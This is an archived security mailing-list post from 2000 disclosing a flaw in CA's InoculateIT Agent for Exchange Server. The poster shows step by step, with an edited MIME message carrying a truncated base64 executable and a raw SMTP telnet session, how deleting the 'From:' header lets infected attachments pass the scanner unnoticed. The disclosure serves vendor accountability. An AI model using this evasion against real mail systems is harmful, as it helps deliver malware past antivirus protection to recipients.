OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: CA's InoculateIT Agent for Exchange Server
From: Hugo Caye (HugoMICMAC.COM.BR)
Date: Fri Nov 10 2000 - 12:29:23 CST


Hi, I'm new in the list, my 1st msg:

The CA's InoculateIT Agent for Exchange Server cannot detect some
messages that have the SMTP headers changed. In October/1999 I
reported it to local CA support office, but still now nothing have
done. Guys at inoc-ntca.com seem to ignore my messages.

The bug can easily be demonstrated telneting on tcp/25 against a EX
Srvr with IMC (the MS SMTP connector/service). I simply change some
SMTP headers and the CA's AVEX Agent neither opens the attached file
that is infected. It is not a signature issue, since I can also send
the CA's virtest.com sample file. Any file can be send, since the AVEX
Agent doesn't recognize the message as having an attached file.

Something like that can be easily done:

1. Get a message containing any infected attached MIME encoded file. I
simply filtered out via EX to C:\TurfDir sending from outside to EX;

2. Edit the file (I used MS Notepad.exe) and just remove the "From:
..." line from the SMTP header. Something like this:

==>> Remove this line: From: Test <Testabc.com.br>
To: Hugo Caye <Hugoxyz.com.br>
Subject: Test
Date: Mon, 23 Oct 2000 10:59:53 -0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: application/x-msdownload;
        name="Fix2001.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
        filename="Fix2001.exe"

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAsAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g
aW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABjDAXbJ21riCdta4gnbWuIJ21riGRta4ikcWWIJm
1riFJpY2gnbWuIAAAAAAAAAABQRQAATAEDAJ/L0zcAAAAAAAAAAOAADwELAQUMABoAAAAA
AgAAAAAAABAAAAAQAAAAMAAA... <<== Removed the rest here;

3. Copy the Notepad content to clipboard;

4. Issue "telnet your_exsrvr 25" command:

220 aaa.xyz.com.br ESMTP Server (Microsoft Exchange Internet Mail
Service 5.5.2650.21) ready
helo
250 OK
mail from:<>
250 OK - mail from <>
rcpt to:<hugoxyz.com.br>
250 OK - Recipient <hugoxyz.com.br>
data
354 Send data. End with CRLF.CRLF

==>> Here, paste from clipboard (Win2K, just a mouse right-click).
Something like this:

To: Hugo Caye <Hugoxyz.com.br>
Subject: Test
Date: Mon, 23 Oct 2000 10:59:53 -0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: application/x-msdownload;
        name="Fix2001.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
        filename="Fix2001.exe"

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAsAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g
aW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABjDAXbJ21riCdta4gnbWuIJ21riGRta4ikcWWIJm
1riFJpY2gnbWuIAAAAAAAAAABQRQAATAEDAJ/L0zcAAAAAAAAAAOAADwELAQUMABoAAAAA
AgAAAAAAABAAAAAQAAAAMAAA... <<== Removed...
....AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

.
250 OK
quit
221 closing connection

5. Message sent, CA's Agent will not detect the infected file.

This is one manner to exploit the Agent. There are at least more two
holes.

I'm not talking about the weaknesses of embedded messages and server
based rules. Both big holes recognized by CA.

How can this bug become public, CA recognize it and _fix_ it?

            Hugo Caye

O__ ----
c/ /'_ ---
(*) \(*) --
~~~~~~~~
ccna ccda
mcneł ncip
mcse cne5